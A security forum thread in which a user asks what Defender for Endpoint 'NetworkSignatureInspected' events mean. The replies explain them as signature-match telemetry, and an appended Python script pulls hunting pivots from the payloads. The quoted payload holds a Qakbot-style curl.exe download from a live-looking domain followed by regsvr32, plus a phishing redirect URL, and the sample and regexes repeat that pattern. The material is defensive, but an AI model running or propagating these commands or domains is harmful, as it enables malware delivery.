MrD
Copper Contributor
Nov 28, 2025

NetworkSignatureInspected

Hi,

Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content.

I've read this article, so understand the basics of the function:

Enrich your advanced hunting experience using network layer signals from Zeek

I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices.

Can anyone provide any clarity on the contents of AdditionalFields where the ActionType is NetworkSignatureInspected? It references, for example, CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://


Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced.

Any assistance with rationalising this would be great, thanks.


2 Replies

  • NetworkSignatureInspected is not an execution or connection event. It’s a network inspection telemetry event generated when Microsoft Defender for Endpoint inspects network traffic against known threat signatures (including Zeek-based signatures and Microsoft threat intelligence patterns).

    In simple terms, it means traffic was inspected and matched against a signature — not that the device executed or downloaded that content.

    The AdditionalFields content you’re seeing is raw or partially decoded network payload that matched a detection signature. In your example, references like CVE-2021-44228, suspicious script fragments, Qakbot indicators, curl.exe strings, and obfuscated JavaScript strongly suggest this was traffic inspected for exploit or malware patterns (likely Log4Shell-related scanning or web-based delivery attempts).

    A few important clarifications:

    1. NetworkSignatureInspected does not mean successful exploitation. It means traffic matched a signature pattern.
    2. If Defender reports no alerts and DeviceNetworkEvents or CommonSecurityLog show no corresponding outbound connections to those domains, this often indicates one of the following:
      • The traffic was blocked upstream.
      • It was passive inspection of inbound scanning traffic.
      • It was signature matching within encrypted or partially reconstructed traffic.
      • The content was embedded in payload inspection but never executed.
    3. The presence of CVE-2021-44228 references is very common in internet-wide scanning activity. Many internet-facing services still receive automated exploit probes. If multiple devices show similar entries, it is very likely opportunistic scanning rather than targeted compromise.

    The encoded and binary-like segments in AdditionalFields are typical of payload fragments captured during deep packet inspection. They are not meant to be human-readable logs; they are signature-matching artifacts.

    If there are:

    • No correlated DeviceProcessEvents (e.g., no suspicious child processes)
    • No successful outbound connections to the referenced domains
    • No Defender alerts tied to the event
    • No abnormal authentication or lateral movement activity

    Then this is most likely inspection of malicious or suspicious network content that did not result in execution or compromise.

    In environments with internet exposure, especially web services, this type of telemetry is normal background noise from automated scanning and botnet activity.

    If you want additional confidence, you can pivot on:

    • RemoteIP from DeviceNetworkEvents
    • Any matching AlertIds
    • Correlated DeviceProcessEvents around the same timestamp
    • DeviceFileEvents involving curl.exe or regsvr32

    But based on what you’ve described, this aligns with expected inspection behavior rather than confirmed compromise.

  • Ankit365
    Iron Contributor

    That’s a really good and subtle observation, and what you’re seeing is actually expected behavior rather than evidence of an active compromise. As of December 2025, entries in DeviceTimeline (or Advanced Hunting) with ActionType = NetworkSignatureInspected are generated by the network inspection engine in Microsoft Defender for Endpoint (MDE). This engine integrates lightweight Zeek-based inspection telemetry into the endpoint sensor. These records represent passive detections of network-layer patterns that Defender recognized and analyzed, not necessarily blocked or executed payloads.

    The AdditionalFields content you’re seeing is a raw snippet of payload data that matched a known network signature; in your case, one related to CVE-2021-44228 (Log4Shell) and some strings commonly used by Qakbot or phishing scripts. Defender is flagging that pattern because its sensor saw traffic that resembled an exploit attempt, perhaps a malformed HTTP request or an external scan. It doesn’t mean the device executed malicious code or contacted those domains. The sensor simply captured the payload signature while inspecting inbound or outbound packets. The same pattern appearing across multiple devices confirms that it was a signature match from a scan or external probe, not a localized infection.

    Because these network inspection events don’t always map to full detections, they don’t raise an alert or show up in Defender’s threat summary. They are primarily included to enrich hunting data and give you network visibility at the packet level. If you check the related device’s DeviceNetworkEvents, you likely won’t see any confirmed connections to those URLs because the request never completed or was intercepted at the inspection layer. The absence of alerts or follow-up activity means Defender treated it as benign background noise or blocked the traffic before any payload was delivered.

    Basically, NetworkSignatureInspected entries indicate that Defender’s network protection module analyzed traffic matching a known signature but didn’t find evidence of compromise. The payloads in the AdditionalFields are fragments of suspicious data observed on the wire, not code that executed on the device. They are useful for correlation and threat hunting but don’t require remediation unless accompanied by alerts or process execution events. Please hit like if you like the solution.
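Both replies recommend pivoting on hostnames, tool names and correlated events rather than reading the raw AdditionalFields blob by eye. The script below is an added example, not code from this thread or from Microsoft: it percent-decodes a NetworkSignatureInspected payload fragment, discards the non-printable bytes, and extracts the values a hunter would carry into DeviceNetworkEvents, DeviceProcessEvents and DeviceFileEvents queries (signature names, CVE references, URLs and their hostnames, and tool names such as curl.exe or regsvr32). The sample payload is constructed to resemble the fragment in the original post, with the real domains replaced by .invalid placeholders; the regular expressions encode the example's own assumptions about how such fragments are laid out.

```python
"""Extract hunting pivots from a NetworkSignatureInspected AdditionalFields fragment.

Added example; assumes the fragment is percent-encoded text with signature
names embedded as '#SCPT:<name>' followed by a NUL byte, as in the post.
"""
import re
from urllib.parse import unquote_to_bytes, urlparse

# Constructed sample, modelled on the fragment in the post. Domains are
# placeholders under .invalid; signature names are copied from the post.
SAMPLE_PAYLOAD = (
    '${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10'
    '<title>redirecting...</title><script>window.location.href='
    '"https://redirect.example.invalid/land/#%90%02%1F";'
    '%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10'
    '&&curl.exe--output%25programdata%25\\dir\\p.dat'
    'https://payload.example.invalid/j.png&&echo"fd"&&regsvr32"'
    '%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10'
    'probe-marker CVE-2021-44228'
)

# Signature name follows '#SCPT:' and runs until the first byte outside this set
# (the NUL terminator seen in the post is replaced by a space before matching).
SIG_RE = re.compile(r"#SCPT:([A-Za-z0-9:/._!-]+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}", re.IGNORECASE)
# Scheme, host, optional port, optional path; stops at whitespace, quotes or angle brackets.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s\"'<>]*)?")
# Tool names that appear in the post's fragment; extend with other LOLBins as needed.
TOOL_RE = re.compile(r"\b(curl\.exe|regsvr32)\b", re.IGNORECASE)


def decode_payload(raw: str) -> str:
    """Percent-decode to bytes, then keep printable ASCII and blank out the rest.

    Bytes such as %90 or %00 are signature-engine framing, not text; replacing
    them with spaces keeps the regexes from running across record boundaries.
    """
    data = unquote_to_bytes(raw)
    return "".join(chr(b) if 32 <= b < 127 else " " for b in data)


def extract_pivots(raw: str) -> dict:
    """Return sorted, de-duplicated pivot values found in the decoded fragment."""
    text = decode_payload(raw)

    # Payload fragments often concatenate shell commands with '&&', so cut a
    # matched URL at the first '&&' to avoid carrying the next command along.
    urls = sorted({m.split("&&")[0] for m in URL_RE.findall(text)})
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})

    return {
        "signatures": sorted(set(SIG_RE.findall(text))),
        "cves": sorted({c.upper() for c in CVE_RE.findall(text)}),
        "urls": urls,
        "hosts": hosts,
        "tools": sorted({t.lower() for t in TOOL_RE.findall(text)}),
    }


if __name__ == "__main__":
    for key, values in extract_pivots(SAMPLE_PAYLOAD).items():
        print(f"{key}:")
        for v in values:
            print(f"  {v}")
```

The hostnames and tool names are the values to feed into the checks the replies list: RemoteUrl or RemoteIP in DeviceNetworkEvents for completed connections, FileName or ProcessCommandLine in DeviceProcessEvents for curl.exe or regsvr32 launches near the event timestamp, and any AlertIds tied to the device. If all of those come back empty, the event stands as a signature match on inspected traffic and nothing more, which is the conclusion both replies reach.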
